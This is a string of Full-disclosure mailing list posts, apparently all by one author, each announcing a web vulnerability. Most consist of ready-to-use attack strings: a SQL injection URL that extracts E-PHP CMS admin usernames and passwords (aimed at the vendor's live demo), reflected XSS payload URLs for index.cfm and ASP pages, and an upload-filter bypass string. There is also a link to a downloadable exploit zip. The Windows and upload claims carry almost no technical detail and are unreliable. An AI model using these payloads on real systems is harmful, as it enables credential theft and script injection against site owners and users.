[Full-disclosure] E-PHP cms SQL Injection Vulnerability
E-PHP cms SQL Injection Vulnerability # Dicovered By: SaiedHacker Group:HackeranShiraz Security Team Web Address: www.HackeranShiraz.Com E-mail:saiedhackeri...@yahoo.com Creator: http://ephpscripts.com # Demo Exploit: http://ephpscripts.com/demo/cms/browsecats.php?cid=-12%20union%20select%200,concat(es_username,0x3a,es_password),2,3%20%20from%20esnm_admin # Exploit: http://Target/cms/browsecats.php?cid=-12%20union%20select%200,concat(es_username,0x3a,es_password),2,3%20%20from%20esnm_admin ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Windows Command Processor Vulnerabilitie
In The Name of God Discover:SaiedHacker Tested on: Winodws XP service Pack2(all version) Winodws XP service Pack1(all version) Visual Basic code exe dump file: http://saiedhacker.persiangig.com/Code.zip Tanx to my Best friends: Arsham Hacker,SiaHacker HackeranShiraz Security Team www.SaiedHackerPro.PersianBlog.IR HackeranShiraz Security Team [EMAIL PROTECTED] www.SaiedHackerPro.PersianBlog.IR www.SaiedHackerPro.MyPersianBlog.Com - Looking for last minute shopping deals? Find them fast with Yahoo! Search.___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] New Ploblem in Index.cfm
In The Name Of God Discoverer:SaiedHacker Group:HackeranShiraz Critical Level : Dangerous This matter happens in index.cfm when We want to run some specific Functions Such as action,event, and hacker Can start attacks such as XSS attack by Using simple script or HtML code. Exploit: Http://www.Site.com/path/index.cfm?action=script Http://www.Site.com/path/index.cfm?event=script Http://www.Site.com/path/index.cfm?fuseaction=script Xss: Http://www.Site.com/path/index.cfm?action=scriptalert(SaiedHacker);/script Http://www.Site.com/path/index.cfm?event=scriptalert(SaiedHacker);/script Http://www.Site.com/path/index.cfm?fuseaction=scriptalert(SaiedHacker);/script Have fun [EMAIL PROTECTED] www.SaiedHackerPro.PersianBlog.com __ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] New problem in Upload section in ASP service
In The Name Of GodGroup:HackeranShiraz Discoverer:SaiedHacker*/### This problem causes errors in ASP service This Problem is because of not checking the input data Well in uploading image files section When the user choosing an image file in uploading section ItÂ’s possible to pass the checking input data by injecting some Charectors and we can easily cause the system */###Exploit: In the uploading field we can type this code: C:\.jpg Then press the upload button Web:http://www.SaiedHackerPro.PersianBlog.com E-mail:[EMAIL PROTECTED] Do you Yahoo!? Get on board. You're invited to try the new Yahoo! Mail Beta.___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] New XSS attack to Microsoft service(ASP)
In THe Name Of GodGroup:HackeranShirazDiscoverer:SaiedHacker/*'*/We have found a security problem in Microsoft service(ASP).This problem is a type of XSS attack and occurs while processing The information.We can cause the problem by a simple (script)code./*'*/Exploit:Http://www.Victim.com/message.asp?msg=scriptalert("SaiedHacker");/script Http://www.Victim.com/message.asp?msg=script%20language=_vbscript_msgbox("SaiedHacker")/script/*'===*/Have time of your life[EMAIL PROTECTED]www.SaiedHackerPro.persianBlog.com Yahoo! Mail Bring photos to life! New PhotoMail makes sharing a breeze. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/